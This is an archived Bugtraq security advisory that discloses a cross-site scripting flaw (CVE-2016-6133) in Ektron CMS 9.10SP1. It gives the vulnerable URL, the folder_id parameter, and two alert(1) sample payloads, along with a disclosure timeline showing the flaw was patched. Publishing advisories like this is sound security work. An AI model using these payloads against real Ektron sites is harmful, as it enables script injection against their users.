lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-Id: <201706190556.v5J5uWYm031364@sf01web1.securityfocus.com>
Date: Mon, 19 Jun 2017 05:56:32 GMT
From: ghasseminia@...il.com
To: bugtraq@...urityfocus.com
Subject: Ektron Version 9.10SP1(Build 9.1.0.184) Cross Site Scripting

# Vulnerability type: Cross Site Scripting
# Vendor: Ektron
# Product: Ektron Content Management System
# Affected version:  9.10SP1(Build 9.1.0.184)
# Patched version: 9.1.0.184SP3(9.1.0.184.3.127)
# Credit: Siyavash Ghasseminia, Edmund Goh 
# CVE ID: CVE-2016-6133

# PROOF OF CONCEPT

Vulnerable URL:
/WorkArea/workarea.aspx?page=content.aspx&action=ViewContentByCategory&folder_id=0&LangType=1033

# VULNERABLE PARAMETERS:
- folder_id


# SAMPLE PAYLOAD
- ',1);});alert(1);//
Or
- <script>alert(1)</script>


# TIMELINE
- 1/7/2016: Vulnerability found
- 4/7/2016: Vendor informed
- 13/7/2016: Vendor responded and acknowledged
- 29/7/2016: Vendor fixed the issue
- 19/6/2017: Public disclosure

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ